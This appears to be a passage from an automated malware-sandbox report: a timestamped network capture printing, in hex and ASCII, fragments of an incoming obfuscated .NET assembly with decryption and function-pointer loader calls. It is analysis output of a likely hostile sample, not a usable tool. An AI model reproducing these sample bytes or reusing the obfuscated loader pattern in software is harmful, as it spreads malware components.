1a 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 cc 81 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 Data Ascii: ?3r0frF!rDr?3rTfrF! rh'r?3r\|frF!6r=r?3rfrF!7rLr?3rfr
2021-09-27 18:36:57 UTC	292	IN	Data Raw: 03 00 46 00 21 1f 8a 1e 72 03 08 8a 01 00 08 00 16 00 d0 87 90 1e 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 1c 8a 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f 9e 1e 72 03 30 8a 01 00 08 00 16 00 d0 87 a4 1e 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 44 8a 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f b2 1e 72 03 58 8a 01 00 08 00 16 00 d0 87 b8 1e 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 6c 8a 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f c6 1e 72 03 80 8a 01 00 08 00 16 00 d0 87 cc 1e 72 03 00 00 00 00 03 00 06 18 3f 00 33 03 72 03 94 8a 01 00 08 00 10 18 66 15 0e 01 72 03 00 00 00 00 03 00 46 00 21 1f da 1e 72 03 a8 8a 01 00 08 00 16 00 d0 87 e0 1e 72 03 00 00 00 00 03 00 06 Data Ascii: F!rr?3rfrF!r0r?3rDfrF!rXr?3rlfrF!rr?3rfrF!rr
2021-09-27 18:36:57 UTC	297	IN	Data Raw: 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 02 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 01 00 8b 17 00 00 Data Ascii:
2021-09-27 18:36:57 UTC	301	IN	Data Raw: 7e 0d c1 02 9c 49 7e 0d c1 02 a0 49 7e 0d c1 02 a6 49 7e 0d c1 02 b1 49 7e 0d c1 02 b7 49 7e 0d ec 00 d9 1a 2d 0d a9 02 3f 00 44 0e c1 02 cd 49 7e 0d ec 00 46 48 35 0d c1 02 d4 49 7e 0d c1 02 dc 49 7e 0d c1 02 ee 49 7e 0d c1 02 00 4a 7e 0d c1 02 09 4a 7e 0d c1 02 12 4a 7e 0d c1 02 1b 4a 7e 0d c1 02 25 4a 7e 0d c1 02 2c 4a 7e 0d c1 02 35 4a 7e 0d c1 02 3e 4a 7e 0d c1 02 47 4a 7e 0d c1 02 50 4a 7e 0d c1 02 59 4a 7e 0d c1 02 62 4a 7e 0d f4 00 d9 1a 2d 0d f4 00 46 48 35 0d f4 00 3f 00 a5 00 c1 02 a2 4a 7e 0d c1 02 aa 4a 7e 0d c1 02 bd 4a 7e 0d ec 00 3f 00 a5 00 cc 00 3f 00 a5 00 dc 00 3f 00 a5 00 b4 00 1e 4b a5 00 81 02 21 1f f9 0e 69 02 21 1f 55 0b fc 00 c6 1a ad 01 fc 00 d9 1a 1d 02 fc 00 d0 1a cd 03 fc 00 3f 00 a5 00 fc 00 1e 4b a5 00 fc 00 0c 55 81 00 f1 Data Ascii: ~I~I~I~I~I~-?DI~FH5I~I~I~J~J~J~J~%J~,J~5J~>J~GJ~PJ~YJ~bJ~-FH5?J~J~J~???K!i!U?KU
2021-09-27 18:36:57 UTC	305	IN	Data Raw: 00 fa 18 00 00 10 00 3f 00 bb 17 00 00 00 00 41 00 04 18 00 00 00 00 8c 00 d8 6e 00 00 00 00 91 00 49 1c 00 00 00 00 63 01 54 23 00 00 00 00 67 01 da 23 00 00 00 00 71 01 45 24 33 00 e1 01 33 00 18 02 49 00 54 03 4b 00 6b 03 49 00 77 03 4f 00 be 03 90 00 5b 04 57 00 e1 01 90 00 fe 04 90 00 03 05 90 00 08 05 90 00 0d 05 90 00 12 05 90 00 17 05 90 00 1c 05 90 00 21 05 90 00 26 05 90 00 2b 05 70 01 e1 01 62 01 9d 07 62 01 e1 01 00 00 00 65 64 69 73 6b 63 7a 00 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 72 69 62 75 74 65 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 6d 73 63 6f 72 6c 69 62 00 2e 63 74 6f 72 00 56 6f 69 64 00 53 79 73 74 65 6d 00 53 74 72 69 6e 67 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 62 75 Data Ascii: ?AnIcT#g#qE$33ITKkIwO[W!&+pbbediskczAssemblyCopyrightAttributeSystem.Reflectionmscorlib.ctorVoidSystemStringAssemblyCompanyAttribu
2021-09-27 18:36:57 UTC	309	IN	Data Raw: 39 39 76 5a 56 69 41 6f 61 52 66 57 37 00 6f 50 35 44 59 4a 39 6c 42 4f 73 35 34 32 6c 63 73 38 35 00 79 59 37 42 49 59 39 4c 52 6f 4c 61 77 50 37 72 73 71 6d 00 4b 33 53 49 75 62 39 42 54 45 4a 57 4d 36 52 57 41 65 5a 00 4e 66 45 6c 71 30 39 75 61 39 6a 4e 57 56 6f 5a 65 33 72 00 58 30 4a 6d 50 52 39 54 51 76 70 48 30 39 6c 75 41 39 32 00 54 47 4a 63 59 49 39 79 4b 4d 48 73 63 39 46 55 65 62 54 00 67 6a 67 6b 74 75 39 56 50 5a 44 58 57 6c 64 78 6a 6a 58 00 78 46 41 55 4a 62 39 76 6d 52 6d 51 41 33 31 31 58 51 4a 00 61 52 79 4e 64 69 39 58 59 57 61 46 34 6c 52 78 67 6e 43 00 41 65 5a 45 70 46 39 69 57 36 61 63 4a 34 51 46 67 4a 4c 00 41 56 43 61 45 6f 39 65 4a 6f 44 70 54 46 53 66 72 52 54 00 6f 75 6e 56 39 53 39 77 36 77 67 31 64 48 79 4a 64 4a 4a 00 76 Data Ascii: 99vZViAoaRfW7oP5DYJ9lBOs542lcs85yY7BIY9LRoLawP7rsqmK3SIub9BTEJWM6RWAeZNfElq09ua9jNWVoZe3rX0JmPR9TQvpH09luA92TGJcYI9yKMHsc9FUebTgjgktu9VPZDXWldxjjXxFAUJb9vmRmQA311XQJaRyNdi9XYWaF4lRxgnCAeZEpF9iW6acJ4QFgJLAVCaEo9eJoDpTFSfrRTounV9S9w6wg1dHyJdJJv
2021-09-27 18:36:57 UTC	313	IN	Data Raw: 66 78 00 51 4e 48 64 6c 42 4c 70 41 78 00 52 6b 49 64 70 45 38 50 36 45 00 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 00 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 00 59 66 35 64 4c 59 71 33 31 77 00 43 75 6c 74 75 72 65 49 6e 66 6f 00 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 00 6d 77 44 72 37 78 70 4a 49 71 38 59 6c 61 31 52 44 4e 6c 00 67 65 74 5f 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 00 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 43 75 6c 74 75 72 65 00 73 65 74 5f 43 75 6c 74 75 72 65 00 6c 4c 43 45 4c 34 70 32 72 54 4c 6f 68 74 39 52 47 68 78 00 79 45 4b 4d 75 66 70 33 6d 54 66 34 67 32 66 33 36 36 75 00 4e 74 49 4a 52 61 70 7a 59 30 70 6c 67 58 64 49 38 58 56 00 6e 4b 33 47 4b 4c 4c 68 37 46 39 6e 32 31 72 48 50 75 48 00 Data Ascii: fxQNHdlBLpAxRkIdpE8P6EResourceManagerSystem.ResourcesYf5dLYq31wCultureInfoSystem.GlobalizationmwDr7xpJIq8Yla1RDNlget_ResourceManagerAssemblyget_Cultureset_CulturelLCEL4p2rTLoht9RGhxyEKMufp3mTf4g2f366uNtIJRapzY0plgXdI8XVnK3GKLLh7F9n21rHPuH
2021-09-27 18:36:57 UTC	317	IN	Data Raw: 6c 71 38 67 48 55 62 34 4d 71 47 31 63 37 00 41 6c 33 4a 64 39 71 4a 6a 41 39 69 46 37 47 47 42 56 67 00 51 59 68 53 31 4f 71 32 6b 45 75 31 42 30 65 70 53 59 46 00 68 42 43 46 76 43 71 33 77 51 62 74 46 53 5a 6e 71 69 54 00 7a 68 6e 76 62 31 71 7a 55 70 47 52 61 76 31 73 53 78 58 00 75 49 76 76 38 46 42 68 42 4c 74 6f 76 79 63 44 39 37 41 00 4d 58 32 6d 79 41 42 64 6e 50 67 53 6b 59 44 33 50 48 4d 00 55 65 78 6d 79 5a 42 78 65 77 4d 74 4d 56 35 78 4a 58 71 00 6c 76 6b 45 4f 37 42 5a 59 39 66 4c 4a 58 55 6e 56 72 4e 00 46 6d 47 4a 74 6c 42 48 66 4e 6e 41 50 79 30 37 32 31 35 00 6e 31 6d 71 71 48 42 45 79 6d 4e 58 61 5a 69 76 51 58 74 00 52 68 71 6c 38 43 42 66 54 42 43 34 34 6a 71 55 6c 6c 4b 00 4f 62 42 77 32 4d 42 67 6e 49 4b 51 38 56 74 53 75 54 31 00 Data Ascii: lq8gHUb4MqG1c7Al3Jd9qJjA9iF7GGBVgQYhS1Oq2kEu1B0epSYFhBCFvCq3wQbtFSZnqiTzhnvb1qzUpGRav1sSxXuIvv8FBhBLtovycD97AMX2myABdnPgSkYD3PHMUexmyZBxewMtMV5xJXqlvkEO7BZY9fLJXUnVrNFmGJtlBHfNnAPy07215n1mqqHBEymNXaZivQXtRhql8CBfTBC44jqUllKObBw2MBgnIKQ8VtSuT1
2021-09-27 18:36:57 UTC	321	IN	Data Raw: 59 49 69 30 4d 36 45 6d 6e 6a 33 4c 6a 4d 65 54 00 67 6f 66 43 42 30 30 45 47 4f 32 45 59 74 30 31 54 32 73 00 6d 33 6a 61 73 4c 30 66 58 52 6c 6b 5a 68 78 4d 75 4d 68 00 6f 48 47 64 70 6e 30 6a 44 4a 33 6f 34 37 30 48 56 6b 6f 00 53 32 59 43 6b 6a 30 6b 68 77 48 57 6f 67 51 4f 39 51 56 00 65 6d 48 5a 5a 68 48 39 76 63 00 6e 4e 68 5a 48 67 6d 6e 35 6b 00 76 53 6f 5a 45 36 41 30 69 65 00 52 4c 4c 5a 66 70 62 72 72 35 00 45 57 38 31 45 53 30 53 47 4f 64 36 72 50 39 65 49 35 70 00 61 32 72 61 51 4b 30 39 55 5a 47 66 4a 39 66 36 52 46 76 00 61 75 76 67 30 74 30 31 38 79 4f 35 4e 6d 43 63 46 44 44 00 43 6c 57 63 41 5a 30 63 52 4b 63 35 74 45 55 73 31 58 31 00 50 41 69 54 33 34 30 4b 75 32 4a 49 33 58 43 4b 52 33 37 00 41 6a 4e 72 39 35 30 6c 31 6e 6d 33 33 31 Data Ascii: YIi0M6Emnj3LjMeTgofCB00EGO2EYt01T2sm3jasL0fXRlkZhxMuMhoHGdpn0jDJ3o470HVkoS2YCkj0khwHWogQO9QVemHZZhH9vcnNhZHgmn5kvSoZE6A0ieRLLZfpbrr5EW81ES0SGOd6rP9eI5pa2raQK09UZGfJ9f6RFvauvg0t018yO5NmCcFDDClWcAZ0cRKc5tEUs1X1PAiT340Ku2JI3XCKR37AjNr950l1nm331
2021-09-27 18:36:57 UTC	324	IN	Data Raw: 41 63 6b 69 46 69 75 55 36 56 70 6a 51 5a 38 6e 49 76 4b 00 52 6a 55 34 77 4d 75 56 48 4d 49 53 43 39 77 54 58 62 4d 00 68 74 51 62 73 73 75 34 68 64 30 6c 35 66 6f 77 51 66 49 00 62 56 35 49 5a 34 75 76 73 4a 54 4c 32 66 58 6c 4c 63 42 00 54 73 4e 77 32 65 75 49 77 56 54 5a 62 6d 64 43 68 35 63 00 4d 44 72 44 67 5a 75 58 43 31 70 56 55 66 4a 63 32 79 46 00 7a 39 54 57 67 41 75 41 79 70 43 39 6c 4d 66 45 6d 73 4e 00 71 62 59 38 79 73 75 59 6b 5a 65 44 68 6b 48 54 72 70 6f 00 66 4a 6e 63 41 73 75 61 55 49 47 5a 4f 38 55 46 75 33 70 00 55 49 57 33 4c 5a 75 72 61 63 74 41 37 31 6a 48 54 6d 33 00 49 64 67 38 79 68 75 52 50 45 62 32 38 76 6c 34 69 79 66 00 6a 5a 4e 33 51 47 75 35 45 54 30 46 6d 56 54 6d 54 71 39 00 43 56 55 48 48 47 75 69 4b 6b 53 44 50 37 58 Data Ascii: AckiFiuU6VpjQZ8nIvKRjU4wMuVHMISC9wTXbMhtQbssu4hd0l5fowQfIbV5IZ4uvsJTL2fXlLcBTsNw2euIwVTZbmdCh5cMDrDgZuXC1pVUfJc2yFz9TWgAuAypC9lMfEmsNqbY8ysuYkZeDhkHTrpofJncAsuaUIGZO8UFu3pUIW3LZuractA71jHTm3Idg8yhuRPEb28vl4iyfjZN3QGu5ET0FmVTmTq9CVUHHGuiKkSDP7X
2021-09-27 18:36:57 UTC	329	IN	Data Raw: 6c 70 00 43 6f 6e 63 61 74 00 47 65 74 44 65 6c 65 67 61 74 65 46 6f 72 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 00 48 55 69 67 6f 30 55 48 62 34 00 6e 33 36 67 4e 4e 6e 74 30 69 00 41 32 4a 67 47 66 57 55 42 55 00 6e 6b 61 67 37 48 54 4d 6c 79 00 61 39 31 67 74 4e 54 4d 70 53 00 50 4c 73 30 4c 37 6a 57 48 33 00 6f 70 5f 45 71 75 61 6c 69 74 79 00 62 75 48 67 44 78 44 65 35 4c 00 4a 48 77 67 4f 4c 65 50 31 37 00 50 42 67 67 38 71 76 67 72 64 00 54 6f 41 72 72 61 79 00 6f 4b 4b 67 4a 56 57 59 46 34 00 73 65 74 5f 4b 65 79 00 73 65 74 5f 49 56 00 43 72 65 61 74 65 44 65 63 72 79 70 74 6f 72 00 57 72 69 74 65 00 47 73 4f 67 32 38 62 4d 31 71 00 67 65 74 5f 4f 66 66 73 65 74 54 6f 53 74 72 69 6e 67 44 61 74 61 00 54 39 64 67 33 38 69 51 71 72 00 53 74 61 Data Ascii: lpConcatGetDelegateForFunctionPointerHUigo0UHb4n36gNNnt0iA2JgGfWUBUnkag7HTMlya91gtNTMpSPLs0L7jWH3op_EqualitybuHgDxDe5LJHwgOLeP17PBgg8qvgrdToArrayoKKgJVWYF4set_Keyset_IVCreateDecryptorWriteGsOg28bM1qget_OffsetToStringDataT9dg38iQqrSta
2021-09-27 18:36:57 UTC	333	IN	Data Raw: 43 00 41 6c 4f 4d 74 70 6b 59 38 44 00 46 56 4b 77 59 77 54 6c 53 6a 55 4d 48 57 71 34 79 51 54 00 73 32 72 49 6e 54 54 70 50 4c 5a 59 75 58 37 30 52 44 71 00 6e 67 59 54 74 48 54 4c 73 77 36 56 6f 6e 6c 77 4c 6f 34 00 42 4e 44 6a 41 6e 54 71 45 50 57 38 6e 32 6f 46 54 70 47 00 79 33 70 33 38 64 54 42 54 4d 51 44 6c 45 5a 65 52 56 53 00 43 72 65 61 74 65 45 6e 63 72 79 70 74 6f 72 00 63 4f 6b 6c 57 4c 54 36 44 79 39 63 76 68 6f 59 57 47 31 00 4d 79 49 61 4f 43 54 57 67 5a 46 63 6f 6e 30 35 56 33 6f 00 57 66 4d 75 6e 59 54 30 52 74 69 6a 49 31 79 55 65 35 78 00 4f 6a 49 74 63 35 54 75 4d 57 75 73 4a 34 67 50 57 66 6a 00 54 6f 42 61 73 65 36 34 53 74 72 69 6e 67 00 63 6c 61 73 73 74 68 69 73 00 63 6f 6d 70 00 69 6e 66 6f 00 66 6c 61 67 73 00 6e 61 74 69 76 Data Ascii: CAlOMtpkY8DFVKwYwTlSjUMHWq4yQTs2rInTTpPLZYuX70RDqngYTtHTLsw6VonlwLo4BNDjAnTqEPW8n2oFTpGy3p38dTBTMQDlEZeRVSCreateEncryptorcOklWLT6Dy9cvhoYWG1MyIaOCTWgZFcon05V3oWfMunYT0RtijI1yUe5xOjItc5TuMWusJ4gPWfjToBase64Stringclassthiscompinfoflagsnativ
2021-09-27 18:36:57 UTC	337	IN	Data Raw: 66 63 33 65 00 6d 5f 61 37 38 31 30 38 33 38 31 32 37 39 34 64 65 63 61 65 37 34 31 34 66 31 63 30 62 33 62 39 37 37 00 6d 5f 66 65 31 66 63 66 35 34 35 63 63 39 34 35 37 66 38 34 65 65 32 64 65 65 63 31 38 33 39 61 35 38 00 6d 5f 33 65 33 38 33 65 61 66 36 66 34 34 34 64 33 62 39 61 65 63 38 66 30 33 65 36 37 63 31 39 35 39 00 6d 5f 63 37 34 34 30 30 64 63 33 31 30 36 34 64 33 33 39 36 66 33 62 35 38 38 32 35 30 37 61 39 30 61 00 6d 5f 30 30 36 39 64 62 32 35 63 33 65 30 34 33 38 62 61 34 64 39 30 36 62 39 39 39 37 64 63 62 38 34 00 6d 5f 38 35 30 35 37 61 61 63 65 66 35 63 34 36 39 36 62 32 37 61 64 30 37 62 65 66 35 30 38 30 62 63 00 6d 5f 32 66 65 33 30 36 66 61 63 37 34 61 34 37 31 33 62 36 64 63 61 38 31 65 63 37 36 37 61 31 37 38 00 6d 5f 35 39 63 Data Ascii: fc3em_a781083812794decae7414f1c0b3b977m_fe1fcf545cc9457f84ee2deec1839a58m_3e383eaf6f444d3b9aec8f03e67c1959m_c74400dc31064d3396f3b5882507a90am_0069db25c3e0438ba4d906b9997dcb84m_85057aacef5c4696b27ad07bef5080bcm_2fe306fac74a4713b6dca81ec767a178m_59c
2021-09-27 18:36:57 UTC	341	IN	Data Raw: 6c 00 43 6c 65 61 72 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 52 65 66 65 72 65 6e 63 65 45 71 75 61 6c 73 00 53 79 6e 63 68 72 6f 6e 69 7a 65 64 00 67 65 74 5f 49 73 42 79 52 65 66 00 47 65 74 45 6c 65 6d 65 6e 74 54 79 70 65 00 52 65 73 6f 6c 76 65 54 79 70 65 00 52 65 61 64 42 79 74 65 00 52 65 61 64 53 69 6e 67 6c 65 00 52 65 61 64 44 6f 75 62 6c 65 00 43 6f 6d 70 61 72 65 54 6f 00 67 65 74 5f 49 73 45 6e 75 6d 00 47 65 74 55 6e 64 65 72 6c 79 69 6e 67 54 79 70 65 00 43 68 61 6e 67 65 54 79 70 65 00 54 6f 4f 62 6a 65 63 74 00 54 6f 55 49 6e 74 36 34 00 54 6f 55 49 6e 74 33 32 00 46 72 65 65 48 47 6c 6f 62 61 6c 00 67 65 74 5f 46 75 6c 6c 4e 61 6d 65 00 47 65 74 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 00 52 65 73 6f 6c 76 65 46 69 65 6c 64 00 52 65 Data Ascii: lClearProjectErrorReferenceEqualsSynchronizedget_IsByRefGetElementTypeResolveTypeReadByteReadSingleReadDoubleCompareToget_IsEnumGetUnderlyingTypeChangeTypeToObjectToUInt64ToUInt32FreeHGlobalget_FullNameGetFunctionPointerResolveFieldRe
2021-09-27 18:36:57 UTC	345	IN	Data Raw: 60 05 07 02 08 12 60 04 08 00 12 60 03 06 12 64 04 00 00 12 64 07 06 15 12 80 9d 01 0e 02 06 02 02 06 08 04 00 00 1d 1c 0b 10 01 04 1d 1c 08 1c 1c 10 1e 00 61 07 32 12 80 cc 12 80 f1 08 08 08 08 1d 12 80 f5 08 12 79 12 80 bc 11 80 90 08 08 12 80 c0 08 08 08 12 80 c4 12 80 c8 08 08 12 80 a0 05 08 1c 08 1d 08 08 12 80 e8 1d 12 80 f5 02 08 12 80 f9 08 12 79 08 12 79 08 12 80 c0 08 1d 1c 12 80 f9 08 08 12 79 02 15 12 80 fd 01 12 80 c4 1c 08 11 80 90 08 15 12 80 9d 01 12 80 c0 08 15 12 80 9d 01 12 80 c4 08 15 12 80 fd 01 12 80 c4 0a 20 01 01 15 12 80 fd 01 13 00 08 15 12 80 9d 01 12 80 a0 02 06 19 07 00 03 1d 1c 08 1c 1c 03 0a 01 08 0a 10 01 03 1d 1c 08 1c 10 1e 00 08 07 03 08 1d 05 12 81 19 06 20 01 01 12 81 1d 04 00 01 01 1c 0e 07 0a 12 81 21 08 08 08 08 08 Data Ascii: ```dda2yyyy !
2021-09-27 18:36:57 UTC	349	IN	Data Raw: 09 08 09 08 1d 05 09 09 09 09 08 08 12 81 21 09 09 09 20 02 01 12 81 1d 11 82 15 05 00 01 1d 0e 1c 08 07 01 15 12 80 9d 01 0e 04 20 00 1d 0e 05 20 00 1d 13 00 07 00 02 12 80 ed 1c 1c 04 07 02 0e 08 05 00 00 12 82 1d 06 20 01 01 12 82 21 05 00 02 1c 1c 09 06 00 02 09 0f 01 09 06 07 03 09 0f 05 09 08 00 03 02 0f 01 0f 01 09 04 07 02 02 09 07 00 03 01 0f 01 05 09 03 07 01 09 08 00 03 01 0f 01 0f 01 09 08 00 03 01 0f 05 0f 05 09 06 07 02 0f 05 0f 05 08 00 03 09 1c 09 11 81 58 08 07 03 09 45 10 05 1d 05 05 00 02 09 1c 09 06 00 03 09 1c 09 1c 21 07 12 45 10 05 45 10 05 0f 05 09 0f 05 0f 05 0f 09 0f 05 09 1d 09 0f 05 09 09 09 05 09 1d 05 1d 05 02 1d 05 06 00 02 1d 05 1c 09 05 07 02 09 1d 05 04 06 11 81 64 04 06 11 81 68 04 06 11 81 6c 04 06 11 81 70 04 06 11 81 Data Ascii: ! !XE!EEdhlp
2021-09-27 18:36:57 UTC	353	IN	Data Raw: 1e ab 1e ac 1e 00 96 80 80 10 50 00 76 ba 1e 22 9d 98 80 60 50 01 22 a9 82 80 a0 01 6f b8 82 80 a0 01 ae b9 82 80 40 20 83 81 80 20 22 a2 82 80 a0 01 72 a3 82 80 a0 01 72 bb 83 80 a0 01 12 18 7a 18 16 11 7a 18 72 90 84 80 a0 01 76 12 32 ba 1e 47 12 19 47 12 1a 22 96 84 80 a0 01 12 19 6b 98 05 22 97 84 80 a0 01 12 1a 7a 18 22 bc 83 80 a0 01 76 1f 45 ba 1e 45 22 90 45 ba 1e 50 00 12 1b a2 9a 83 80 40 6b be 05 72 bd 82 80 a0 01 6f b4 97 80 60 12 1c 7a 1c 72 b5 97 80 60 50 00 04 72 b6 82 80 a0 01 7a 1c 7a 1c 72 b5 97 80 60 72 be 82 80 a0 01 07 72 b6 97 80 60 12 1d 50 20 93 ad 80 80 10 12 82 01 50 1a 50 9d 01 8d 12 83 01 7a 82 01 50 00 7a 83 01 2a 50 ac 03 50 8e 01 28 12 83 01 7a 82 01 50 00 7a 83 01 2a 7a 82 01 50 00 50 82 03 50 af 01 28 2a 7a 82 01 50 01 50 Data Ascii: Pv"`P"o@ "rrzzrv2GG"k"z"vEE"EP@kro`zr`Przzr`rr`P PPzPzPP(zPzzPPP(*zPP
2021-09-27 18:36:57 UTC	356	IN	Data Raw: 2a 7a 3c 50 0c 50 8a 02 50 2e 28 2a 50 24 50 0c 8d 12 3d 7a 3c 50 0c 7a 3d 2a 7a 3c 50 0c 50 b5 03 50 91 01 28 2a 7a 3c 50 0c 50 98 03 50 88 01 28 2a 7a 3c 50 0c 50 ab 03 50 8e 01 28 2a 50 ac 02 50 01 8d 12 3d 7a 3c 50 0c 7a 3d 2a 50 9c 02 50 34 28 12 3d 7a 3c 50 0d 7a 3d 2a 50 ad 03 50 8f 01 28 12 3d 7a 3c 50 0d 7a 3d 2a 50 88 03 50 82 01 28 12 3d 7a 3c 50 0d 7a 3d 2a 7a 3c 50 0d 50 a5 03 50 8c 01 28 2a 50 85 03 50 aa 01 28 12 3d 7a 3c 50 0d 7a 3d 2a 7a 3c 50 0e 50 86 01 50 1e 8d 2a 7a 3c 50 0e 50 30 50 92 01 8d 2a 50 a7 02 50 37 28 12 3d 7a 3c 50 0e 7a 3d 2a 50 ae 03 50 8f 01 28 12 3d 7a 3c 50 0e 7a 3d 2a 50 2f 50 1c 28 12 3d 7a 3c 50 0e 7a 3d 2a 7a 3c 50 0f 50 94 03 50 86 01 28 2a 50 98 01 50 11 8d 12 3d 7a 3c 50 0f 7a 3d 2a 50 a7 02 50 37 28 12 3d 7a Data Ascii: z<PPP.(P$P=z<Pz=z<PPP(z<PPP(z<PPP(PP=z<Pz=PP4(=z<Pz=PP(=z<Pz=PP(=z<Pz=z<PPP(PP(=z<Pz=z<PPPz<PP0PPP7(=z<Pz=PP(=z<Pz=P/P(=z<Pz=z<PPP(PP=z<Pz=*PP7(=z
2021-09-27 18:36:57 UTC	361	IN	Data Raw: 06 50 0f 50 a5 02 50 37 28 2a 50 84 02 32 bf 1e 50 ab 01 50 20 8d 12 0d 50 b0 05 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 01 50 03 7a 17 2a 50 9d 02 32 bf 1e 50 bb 01 50 16 8d 12 0c 50 37 32 bf 1e 7a 01 50 0b 50 39 50 26 28 2a 50 31 22 89 95 80 60 16 bf 1e 90 50 ab 04 32 bf 1e 7a 06 50 09 7a 0c 2a 50 9d 01 32 bf 1e 7a 06 50 05 7a 0d 2a 50 95 05 32 bf 1e 7a 06 50 1e 7a 0d 2a 50 a2 05 22 89 95 80 60 76 bf 1e 90 32 be 1e 50 bf 02 50 3f 28 12 0c 50 bd 04 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 06 50 01 7a 0c 2a 50 9a 05 22 89 95 80 60 76 bf 1e 90 32 be 1e 7a 01 50 05 50 2a 50 9e 01 8d 2a 50 30 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 10 22 b9 94 80 60 50 00 04 22 ba 94 80 60 50 ac 04 32 bf 1e 7a 01 50 08 50 89 03 50 83 01 28 2a 50 8b 02 22 8a 95 80 60 16 bf 1e 90 Data Ascii: PPP7(P2PP P"`2zPzP2PPP72zPP9P&(P1"`P2zPzP2zPzP2zPzP"`v2PP?(P"`2zPzP"`v2zPPPP0"`2z"`P"`P2zPPP(P"`
2021-09-27 18:36:57 UTC	365	IN	Data Raw: bb 03 32 bf 1e 7a 06 50 0a 50 b9 03 50 93 01 28 2a 50 a2 03 32 bf 1e 32 ad 39 50 bf 04 32 bf 1e 7a 01 50 0e 7a 17 2a 50 a5 05 22 8a 95 80 60 16 bf 1e 90 32 be 1e 50 84 02 50 88 01 28 12 0d 50 93 05 32 bf 1e 7a 01 50 0e 7a 17 2a 50 2f 32 bf 1e 7a 06 50 0b 7a 0c 2a 50 82 04 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 06 50 1f 7a 0c 2a 50 33 32 bf 1e 50 b8 01 50 94 01 8d 12 0c 50 83 02 22 89 95 80 60 76 bf 1e 90 32 be 1e 7a 01 50 09 50 8d 02 50 2f 28 2a 50 ae 03 32 bf 1e 50 a1 01 50 3e 8d 12 0d 50 ac 02 22 89 95 80 60 76 bf 1e 90 32 be 1e 50 9b 01 50 07 8d 12 17 50 99 03 22 8a 95 80 60 16 bf 1e 90 32 be 1e 50 bd 02 50 9a 01 28 12 0d 50 8a 03 32 bf 1e 50 9d 03 50 89 01 28 12 0c 50 2e 32 bf 1e 7a 06 50 1c 7a 0c 2a 50 1a 32 bf 1e 7a 06 50 1e 7a 0d 2a 50 a7 05 32 bf Data Ascii: 2zPPP(P229P2zPzP"`2PP(P2zPzP/2zPzP"`2zPzP32PPP"`v2zPPP/(P2PP>P"`v2PPP"`2PP(P2PP(P.2zPzP2zPzP2
2021-09-27 18:36:57 UTC	369	IN	Data Raw: ea 21 78 11 70 31 c6 ca 0c 30 26 d5 02 33 64 99 d5 96 fa 16 1b 88 f7 ec 73 84 f8 1c 08 f7 30 9f 24 ba 1a 3c 06 20 ae d5 0a 21 eb d5 28 6f 77 ea 39 d7 16 81 18 6e 1d 37 f9 f1 c7 34 72 bc e3 0f 5c df e2 0d 76 33 30 b7 95 d0 64 74 23 ed cb 23 e4 62 09 1b 7a 4f 9f 78 ba 0c 69 19 ee e0 01 33 fb 91 2a 4b 59 c1 20 fb 46 e2 4b a3 8a e3 f8 90 85 62 0d 54 7c 9b a7 21 dc 4c 8e 85 55 56 48 0a fc 9e b9 3c 34 69 82 b6 c3 4a d9 c4 38 a4 d3 46 f8 8d 12 20 97 92 44 0d 7d c6 35 5b bb 6d 1c ba 07 54 4b b0 45 07 dd 9c 3b 54 9f eb c7 02 86 f9 d0 39 9a 85 46 1b 8c 68 01 e5 0a 95 ca 2e e8 3a 46 70 53 d3 34 26 3c f7 81 d9 13 2d e6 b4 b8 3e 84 8b 7d 2d ca 04 1e a5 42 42 51 b4 b5 68 d2 c0 bc 3c 6f 5a db 5d 98 73 d1 10 eb 2d b8 a2 1b ae 1f e2 42 39 34 95 7d 27 e2 1b 14 0c 7a e1 0d Data Ascii: !xp10&3ds0$< !(ow9n74r\v30dt##bzOxi3*KY FKbT\|!LUVH<4iJ8F D}5[mTKE;T9Fh.:FpS4&<->}-BBQh<oZ]s-B94}'z
